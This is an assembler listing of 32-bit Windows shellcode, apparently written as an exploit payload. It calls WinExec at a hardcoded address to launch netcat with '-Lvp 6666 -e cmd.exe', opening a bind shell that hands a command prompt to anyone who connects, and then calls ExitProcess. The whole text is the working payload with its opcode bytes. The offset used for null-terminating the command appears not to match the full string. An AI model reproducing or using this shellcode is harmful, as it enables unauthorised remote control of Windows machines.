     1                                  section .txt
     2                                  	global _start
     3                                  _start:
     4 00000000 EB19                    	jmp short getcommand
     5                                  process:
     6 00000002 31C0                    	xor eax, eax		; clearing registers
     7 00000004 5B                      	pop ebx				; getting cmd.exe in eax
     8 00000005 884323                  	mov [ebx+35], al	; termination string with null
     9 00000008 BA61305B77              	mov edx, 0x775b3061	; storing the WinExec Address in registers
    10 0000000D 50                      	push eax			; push paramenter
    11 0000000E 53                      	push ebx			; push paramenter
    12 0000000F FFD2                    	call edx			; calling WinExec
    13                                  	
    14 00000011 31DB                    	xor ebx, ebx		; clearing the registers
    15 00000013 B8B0795377              	mov eax, 0x775379b0	; Storing the ExitProcess Address in registers
    16 00000018 53                      	push ebx			; push paramenter
    17 00000019 FFD0                    	call eax			; calling ExitProcess to cleanly exit
    18                                  	
    19                                  getcommand:
    20 0000001B E8E2FFFFFF              	call process
    21 00000020 433A5C55736572735C-     	dw 'C:\Users\rajat\Downloads\nc -Lvp 6666 -e cmd.exe', 0	; 0 replaces space 
    22 00000029 72616A61745C446F77-
    23 00000032 6E6C6F6164735C6E63-
    24 0000003B 202D4C767020363636-
    25 00000044 36202D6520636D642E-
    26 0000004D 6578650000         
